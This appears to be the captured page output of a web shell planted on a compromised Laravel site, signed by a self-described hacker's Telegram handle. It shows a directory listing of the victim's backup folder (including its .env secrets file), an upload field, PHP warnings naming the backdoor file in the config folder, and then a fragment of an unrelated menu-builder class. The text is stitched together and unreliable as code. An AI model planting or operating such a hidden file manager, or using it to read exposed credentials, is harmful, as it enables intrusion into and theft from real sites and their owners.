telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log18800702 KBJuly 18 2025 20:00:260644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
views = $views; $this->config = $config; } /** * Make new menu. * * @param string $name * @param Closure $callback * * @return \Nwidart\Menus\MenuBuilder */ public function make($name, \Closure $callback) { return $this->create($name, $callback); } /** * Create new menu. * * @param string $name * @param Callable $resolver * * @return \Nwidart\Menus\MenuBuilder */ public function create($name, Closure $resolver) { $builder = new MenuBuilder($name, $this->config); $builder->setViewFactory($this->views); $this->menus[$name] = $builder; return $resolver($builder); } /** * Check if the menu exists. * * @param string $name * * @return bool */ public function has($name) { return array_key_exists($name, $this->menus); } /** * Get instance of the given menu if exists. * * @param string $name * * @return string|null */ public function instance($name) { return $this->has($name) ? $this->menus[$name] : null; } /** * Modify a specific menu. * * @param string $name * @param Closure $callback * @return void */ public function modify($name, Closure $callback) { $menu = collect($this->menus)->filter(function ($menu) use ($name) { return $menu->getName() == $name; })->first(); $callback($menu); } /** * Render the menu tag by given name. * * @param string $name * @param string $presenter * * @return string|null */ public function get($name, $presenter = null, $bindings = array()) { return $this->has($name) ? $this->menus[$name]->setBindings($bindings)->render($presenter) : null; } /** * Render the menu tag by given name. * * @param $name * @param null $presenter * * @return string */ public function render($name, $presenter = null, $bindings = array()) { return $this->get($name, $presenter, $bindings); } /** * Get a stylesheet for enable multilevel menu. * * @return mixed */ public function style() { return $this->views->make('menus::style')->render(); } /** * Get all menus. * * @return array */ public function all() { return $this->menus; } /** * Get count from all menus. * * @return int */ public function count() { return count($this->menus); } /** * Empty the current menus. */ public function destroy() { $this->menus = array(); } }